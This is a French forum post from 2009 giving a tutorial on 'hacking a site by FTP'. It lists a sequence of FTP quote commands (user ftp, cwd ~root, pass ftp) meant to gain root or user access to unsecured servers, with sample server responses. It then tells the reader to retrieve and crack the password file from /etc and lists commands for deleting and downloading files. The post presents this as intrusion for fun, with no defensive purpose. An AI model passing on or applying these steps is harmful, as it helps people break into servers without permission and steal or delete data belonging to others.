| ledoc | | lovers | | Nouveau membre |  | | 44 messages postés |
|  Posté le 28-11-2009 à 09:18:51   
| Hacker un site par FTP
D'abord on va expliquer ce qu'est ftp. FTP (files transfert protocol) c'est un protocole qui permet de
transmettre des fichiers d'un ordinateur à un autre. Les ports qui lui sont attribués sont les n°20 et 21.
Quand vous allez sur un site de Warez pour choper des progs crackés vous passez généralement par ftp,
vous voulez télécharger une page WEB, c'est aussi par ftp, quand vous vous rendez sur un serveur en tant
que user, c'est aussi des fois par ftp. Si vous êtes sous windows, pour ouvrir une fenêtre ftp, il faut
faire: Démarrer, Exécuter, et taper "ftp -n"
Bon, faut pas pousser non plus, c'est pas aussi simple que ça de hacker un serveur par ftp, il suffit
pas d'ouvrir la fenêtre ftp, c'est plus compliqué car chaque serveur demande un login et un password
pour chaque user.
Le truc que je vais vous donner ne marche que sur les serveurs non sécurisés alors n'essayez pas
ça sur le Pentagone, ça marchera pas. On parle toujours du Pentagone, de la CIA, de la Nasa...
mais il y a pleins de serveurs sécurisés dans le monde et ils ne sont pas forcement gouvernementaux,
loin de là...
Je vous donne le truc et on en reparle après:
open url_du_site
quote user ftp
quote cwd ~root
quote pass ftp
Mettez des espaces ou je les ai mis et tout ce passera bien.
Exemple:
open www.site.com
quote user ftp
quote cwd ~root
quote pass ftp
Ici le serveur a comme adresse url: http://www.site.com/.
Ces instructions doivent être entrées dans un fenêtre ressemblant beaucoup à celle du dos, à chaque
ligne, il y aura marqué "ftp>".
Pour ouvrir cette fenêtre on procède comme expliqué précedement. Une fois connecté à un site
(après avoir tapé: open url_du_site), vous verrez apparaitre "Connected to url_du_site". Il se peut qu'après
vous être connecté à un serveur vous receviez le message suivant: "Ce serveur est protégé" ou "attention
aux malversations que vous pourrez faire" ou "regardes par la fenêtre, les flics sont déjà en bas
de chez toi"... Dans ce cas là c'est même pas la peine d'aller plus loin car à 99% le serveur est sécurisé
car si l'administrateur réseau a pu être assez consciencieux pour mettre un message d'avertissement,
il l'est assez pour nous empêcher de pénétrer de cette manière dans sont serveur.
Il se peut même qu'une fois connecté, vous voyez "Connexion closed by remote host.", là c'est encore plus
vache, c'est que le serveur n'est pas accessible de cette manière par ftp. De cette manière seulement....
On va voir maintenant ce que le serveur répond en fonction de ce que l'on marque et de si oui ou
non on pourra rentrer dedans:
Ce qui est en bleu c'est ce que l'on tape
Ce qui est en vert c'est ce que le serveur répond
Ce qui est en noirce sont des remarques de ma part
Serveur que l'on pourra hacker par ce moyen :Serveur que l'on ne pourra pas hacker par ce moyen :ftp>open www.site.comopen www.site.comConnected to www.site.com
220 websrv1 Microsoft FTP Service (Version 4.0).Connected to www.site.com
websrv1 Microsoft FTP Service (Version 4.0)."Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de celui ci... Il se peut même qu'il y ait marqué la
date et l'heure de la dernière mise à jour.""Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de celui ci... Il se peut
même qu'il y ait marqué la
date et l'heure de la dernière mise à jour."
ftp>quote user ftpftp>quote user ftp331 Anonymous acces allowed, send identify (e-mail name) as password.331 Password required for ftp.ftp>quote cwd ~rootftp>quote cwd ~root530 Please login with USER and PASS.530 Please login with USER and PASS.ftp>quote pass ftpftp>quote pass ftp230 Anonymous user logged in.530 User ftp cannot log in.Voilà, logiquement et sauf erreur vous êtes root ou tout du moins user, si c'est le cas, il faut trouver /etc puis décrypter le password et là vous vous connecterez en tant que root. Bon, bah là, rien à faire avec cette méthode, c'est probablement un serveur dit "secure", quoi que... Bref une seule remarque:
Une fois que vous êtes root ou user, ca sont les commandes ftp qui s'appliquent (pas les commandes
dos ni les commandes unix):
mkdir : pour créer un répertoire (exemple: mkdir site crée le répertoire site).
rmdir : pour supprimer un répertoire (exemple: rmdir site supprime le répertoire site).
pwd : pour voir ou vous êtes sur le disque.
cd : pour aller dans un répertoire (exemple: cd site pour aller dans le répertoire site).
dir : pour voir le contenu de la racine ou du répertoire où vous êtes.
cd / : pour revenir à la racine. Ne pas oublier l'espace entre cd et /.
cd .. : pour revenir au répertoire précédent. Ne pas oublier l'espace entre cd et ..
del : pour supprimer un fichier (exemple: del site.txt supprime le fichier site.txt).
get : pour prendre un fichier et le mettre sur votre bureau
Pour quitter ftp, vous n'avez qu'à taper "quit". Voilà c'est tout, amusez vous bien mais ne
foutez pasla merde !!!
--------------------
Bonjour a tous , G'Day All / Désolé pour certain tutorial qui sont en anglais / Et bon Hack! / |
|
